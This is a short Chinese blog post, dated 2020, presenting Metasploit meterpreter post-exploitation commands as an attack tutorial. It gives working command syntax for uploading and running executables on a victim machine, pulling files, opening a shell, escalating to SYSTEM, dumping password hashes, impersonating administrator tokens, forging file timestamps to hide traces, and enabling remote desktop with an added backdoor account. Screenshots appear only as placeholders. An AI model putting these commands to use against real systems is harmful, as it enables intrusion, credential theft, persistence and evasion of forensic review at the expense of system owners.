MSF之meterpreter攻击使用方法

2020-03-10  本文已影响0人  JyinP

进入界面


image.png
命令:upload <file> <destination> ---- 上传本机的任意文件到远程目标主机中。

正确写法upload //root//1.exe c://1.exe


image.png
命令:

命令:execute -f <path> [options] 正确写法:execute -f c://11.exe
---执行命令


image.png

download命令可以下载远程主机上的文件

命令:download <file> <path to save>

正确写法download c://1.txt //root//

image.png
显示目标主机上所有正在运行的进程

ps命令


image.png
获取目标主机的cmd

shell命令可以进入目标主机的cmd

image.png
获取admin权限

getsystem命令可以提权到本地系统权限


image.png
hashidump使用Hashdump转储所有hash值

我们可以使用meterpreter shell来dump目标主机的当前系统账户和密码。

image.png
模拟任意用户登录 token

模拟任意用户(token操作)
这个进程对于攻击像微软活动目录这样的分布式系统非常有帮助,因为在微软活动目录中,本地访问权限并没多大用,但是如果能搞到凭证尤其是管理员凭证,那就非常有用了。

incognito最开始是一个独立的应用,当你成功入侵系统后可以用它来模拟用户tokens。这个应用后来集成到了metasploit,并且最终集成到了meterpreter中,使用如下:

在meterpreter会话中加载这个模块非常简单,只要输入 use incognito命令即可

输入list_tokens -u来显示所有有效的tokens

我们需要模拟某个token来获取其权限。还有注意,如果成功模拟了一个token,我们可以使用getuid命令来检查当前用户ID
use incognito
list_tokens -u
impersonate_token "win7_qi-pc/administor"
注:这个好像只能从高等级的用户向低权限的用户转换

image.png
伪造时间戳

timestomp C://4.png -f C://1.txt

image.png
开启3386

run post/windows/manage/enable_rdp

开启远程桌面

image.png image.png

run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户


image.png
上一篇 下一篇

猜你喜欢

热点阅读